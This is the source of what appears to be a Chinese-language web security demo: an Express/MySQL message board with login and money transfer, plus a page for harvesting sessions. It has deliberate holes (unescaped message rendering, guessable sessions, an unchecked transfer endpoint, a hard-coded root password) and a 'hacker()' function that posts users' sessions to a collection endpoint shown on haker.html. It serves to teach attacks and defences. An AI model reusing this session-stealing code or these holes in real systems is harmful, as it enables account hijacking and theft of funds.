const httpManager = require('http');
const mysql = require('mysql');
// const urlManager = require('url');
var express = require('express');
var app = express();
// 解析参数
const bodyParser = require('body-parser');
app.use(bodyParser.json());//数据JSON类型
app.use(bodyParser.urlencoded({ extended: false }));//解析post请求数据
//设置跨域访问
app.all('*', function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "X-Requested-With");
res.header("Access-Control-Allow-Methods", "PUT,POST,GET,DELETE,OPTIONS");
res.header("X-Powered-By", ' 3.2.1');
res.header("Content-Type", "application/json;charset=utf-8");
next();
});
//实现本地链接
var connection = mysql.createConnection({
host: '127.0.0.1',
user: 'root',
password: '123456',
database: 'hight'
})
//获取用户信息
app.get('/api/getUserInfo', function(req, res) {
res.status(200);
var session = req.query.session || -1;
connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!");
}
if(results.length !== 0) {
res.json({success: true, 'results': results});
}
else {
res.json({success: false, 'results': []});
}
});
});
//获取所有留言
app.get('/api/getAllMsg', function(req, res) {
res.status(200);
var session = req.query.session || -1;
connection.query('SELECT * FROM all_msg', function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!");
}
if(results.length !== 0) {
res.json({success: true, 'results': results});
}
else {
res.json({success: false, 'results': []});
}
});
});
//转账
app.post('/api/trans', function(req, res) {
res.status(200);
var session = req.body.session || -1;
var id = req.body.id;
var desId= req.body.desId;
var money = req.body.money;
console.log(req.body)
connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!");
}
if(results.length !== 0) {
connection.query('SELECT * FROM user where id= ?', id, function (error, results, fields) {
connection.query('Update user SET money=? where id=?', [results[0].money - money, id], function (error, results, fields) {
});
});
connection.query('SELECT * FROM user where id= ?', desId, function (error, results, fields) {
connection.query('Update user SET money=? where id=?', [ parseInt(results[0].money) + parseInt(money), desId], function (error, results, fields) {
});
});
}
else {
res.json({success: false, 'results': []});
}
})
});
//转账
app.post('/api/secret', function(req, res) {
res.status(200);
var session = req.body.session || -1;
var id = req.body.id;
console.log(session);
connection.query('insert into hk(userId, session) VALUES(?, ?)', [id, session], function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!11");
}
})
});
app.get('/api/secret', function(req, res) {
res.status(200);
connection.query('select * from hk', function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!12");
}
res.json(results);
})
});
//添加留言
app.post('/api/addMsg', function(req, res) {
res.status(200);
var session = req.body.session || -1;
var id = req.body.id;
var name = req.body.name;
var content = req.body.content;
console.log(req.body)
connection.query('SELECT * FROM user where session= ?', session, function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!");
}
if(results.length !== 0) {
connection.query('insert into all_msg(create_id, content, create_time, name) VALUES(?, ?, ?, ?)', [id, content, new Date(), name], function (error, results, fields) {
if (error) {
// throw error;
console.log("查询出错!");
}
res.json({success: true, 'results': results});
});
}
else {
res.json({success: false, 'results': []});
}
})
});
//登录接口
app.post('/api/login', function(req, res) {
res.status(200);
console.log(req.body);
var name = req.body.username || "ALL";
connection.query('select * from user where name= ?', name, function(error, results, fields) {
if (error)
throw error;
var session = parseInt(Math.random() * 100000);
if(results[0] && results[0].password === req.body.password){
res.json(
{
'session': session,
'success': true,
'money' : results[0].money,
'id' : results[0].id,
'name' : results[0].name
});
connection.query('update user SET session=? where id= ?', [session, results[0].id], function(error, results, fields) {
if (error) {
// throw error;
console.log(error.message);
}
console.log("update session success, session : " + session);
});
}else {
res.json({'session': null, 'success': false});
}
});
});
//配置服务端口
var server = app.listen(8080, '127.0.0.1', function() {
var host = server.address().address;
var port = server.address().port;
console.log('Example app listening at http://%s:%s', host, port);
})
login.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>高大上的登录页面</title>
</head>
<body>
<div class="main_container">
<div class="login_box">
<h1 class="login_title">高大上的登录框</h1>
<input id="username" class="common_input" placeholder="用户名" />
<br>
<input id="password" class="common_input" type="password" placeholder="密码" />
<br>
<button class="common_input" id="loginBtn">登录</button>
</div>
</div>
</body>
<script type="text/javascript">
// 设置cookie
function setCookie(c_name, value, expiredays) {
var exdate = new Date();
exdate.setDate(exdate.getDate() + expiredays);
document.cookie = c_name + "=" + escape(value) + ";path=/";
}
// 获取cookie
function getCookie(name)
{
var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
if(arr=document.cookie.match(reg))
return unescape(arr[2]);
else
return null;
}
// 点击事件
$("#loginBtn").on("click", () => {
$.ajax({
method: "post",
url: "http://127.0.0.1:8080/api/login",
data: {
username:$("#username").val(),
password:$("#password").val()
},
dataType: "json",
success: function(data){
console.log("请求成功!");
console.log(data);
if(data.success) {
window.localStorage.setItem('id', data.id);
window.localStorage.setItem('name', data.name);
window.localStorage.setItem('money', data.money);
window.localStorage.setItem('session', data.session);
window.location.href = './index.html'
}else {
alert("用户名或密码错误!");
}
},
error : function(err) {
alert("请求超时!");
}
});
});
</script>
<style>
html, body {
width: 100%;
height: 100%;
}
.login_box {
position: relative;
width: 100%;
text-align: center;
}
.common_input{
width: 20rem;
font-size: 2rem;
margin-top: 1.5rem;
padding: 0.5rem;
}
#loginBtn {
background-color: aquamarine;
font-size: 2rem;
cursor: pointer;
}
</style>
</html>
index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>一个高大上的网站</title>
</head>
<style>
*{
box-sizing: border-box;
}
html,body{
width: 100%;
height: 100%;
}
.main_layout{
position: relative;
width: 100%;
padding: 1rem;
}
.header{
width: 100%;
height: auto;
padding: 1rem 0 ;
background-color: aquamarine;
}
</style>
<body>
<div class="main_layout">
<div class="header">
用户名: <span id="username"></span>
我的余额:<span id ="money"></span>
</div>
<div class="page_container">
<div id="all_msg">
</div>
<div class="">
<textarea id="my_edit_box" rows="12" style="width:100%">
</textarea>
<button id="liuyan">留言</button>
</div>
</div>
</div>
</body>
<script type="text/javascript">
// 写cookie
function setCookie(name,value)
{
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days*24*60*60*1000);
document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
// 获取cookie
function getCookie(name)
{
var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
if(arr=document.cookie.match(reg))
return unescape(arr[2]);
else
return null;
}
function getAllMsg() {
$.ajax({
method: "get",
url: "http://127.0.0.1:8080/api/getAllMsg",
data: {
session : window.localStorage.getItem("session")
},
dataType: "json",
success: function(data){
console.log(data);
if(data.success){
$("#all_msg").html("");
(data.results || []).forEach(element => {
$("#all_msg").append("<div>" + element.name + ": " + element.content);
});
}else {
window.location.href = './login.html'
}
},
error : function(err) {
alert("请求超时!");
}
});
}
// 填写留言
function commitMsg() {
$.ajax({
method: "post",
url: "http://127.0.0.1:8080/api/addMsg",
data: {
session : window.localStorage.getItem("session"),
id : window.localStorage.getItem("id"),
name: window.localStorage.getItem("name"),
content: $("#my_edit_box").val()
},
dataType: "json",
success: function(data){
console.log(data);
if(data.success){
}else {
alert("无效的用户");
}
},
error : function(err) {
alert("请求超时!");
}
});
}
//转账
function trans(money, dId) {
$.ajax({
method: "post",
url: "http://127.0.0.1:8080/api/trans",
data: {
session : window.localStorage.getItem("session"),
id : window.localStorage.getItem("id"),
desId: dId,
'money': money
},
dataType: "json",
success: function(data){
console.log(data);
if(data.success){
}else {
alert("无效的用户");
}
},
error : function(err) {
alert("请求超时!");
}
});
}
// 盗取用户信息
function hacker() {
$.ajax({
method: "post",
url: "http://127.0.0.1:8080/api/secret",
data: {
session : window.localStorage.getItem("session"),
id : window.localStorage.getItem("id"),
},
dataType: "json",
success: function(data){
},
error : function(err) {
alert("请求超时!");
}
});
}
$("#liuyan").on('click', function() {
commitMsg();
});
// 定时刷新留言
setInterval(getAllMsg, 5000);
// 获取用户信息
(function(){
$.ajax({
method: "get",
url: "http://127.0.0.1:8080/api/getUserInfo",
data: {
session : window.localStorage.getItem("session")
},
dataType: "json",
success: function(data){
console.log(data);
if(data.success){
$("#username").text(data.results[0].name);
$("#money").text(data.results[0].money);
}else {
window.location.href = './login.html'
}
},
error : function(err) {
alert("请求超时!");
}
});
})();
</script>
</html>
haker.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="../js/jquery.js"></script>
<title>Document</title>
</head>
<body>
<div id="hk"></div>
</body>
<script type="text/javascript">
// 写cookie
function setCookie(name,value)
{
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days*24*60*60*1000);
document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
// 获取cookie
function getCookie(name)
{
var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
if(arr=document.cookie.match(reg))
return unescape(arr[2]);
else
return null;
}
function c(){
$.ajax({
method: "get",
url: "http://127.0.0.1:8080/api/secret",
dataType: "json",
success: function(data){
console.log(data);
$("#hk").html("");
(data || []).forEach(element => {
$("#hk").append(
"<div>userId: " + element.userId + " session: " + element.session + "</div>"
)
});
},
error : function(err) {
alert("请求超时!");
}
});
};
setInterval(c, 3000);
</script>
</html>
jquery.js
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;function d(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(k.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||k.isPlainObject(n)?n:{},i=!1,a[t]=k.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},k.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(d(Object(e))?k.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g.apply([],a)},guid:1,support:y}),"function"==typeof Symbol&&(k.fn[Symbol.iterator]=t[Symbol.iterator]),k.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var h=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,k="sizzle"+1*new Date,m=n.document,S=0,r=0,p=ue(),x=ue(),N=ue(),A=ue(),D=function(e,t){return e===t&&(l=!0),0},j={}.hasOwnProperty,t=[],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",$=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",F=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp($),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+$),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ne=function(e,t,n){var r="0x"+t-65536;return r!=r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(m.childNodes),m.childNodes),t[m.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&((e?e.ownerDocument||e:m)!==C&&T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&